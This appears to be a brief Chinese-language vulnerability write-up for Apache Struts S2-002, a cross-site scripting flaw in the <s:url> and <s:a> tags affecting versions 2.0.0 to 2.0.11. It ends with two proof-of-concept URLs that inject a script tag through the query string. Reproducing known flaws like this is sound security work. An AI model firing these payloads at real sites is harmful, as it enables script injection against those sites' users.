# s2-002
### 一、漏洞简介
```
对于<s:url>和<s:a>标签,可以在构造和呈现标签的结果URL时注入不能正确转义的参数值。以下情况是已知的:
构造<s:a>结果中包含的参数值可以注入未转义的双引号,从而可以通过转义已渲染的href属性来在生成的HTML中注入代码。
当includeParams设置为“none”的任何其他值时,<s:url>和<s:a>标签无法转义<script>
```
### 二、漏洞影响
Struts 2.0.0 - Struts 2.0.11
### 三、复现过程
poc
```bash
http://url:8080/index.action?"><script>alert(1)</script><"
```
```bash
http://url:8080/index.action?<script>alert(1)</script>test=hello
```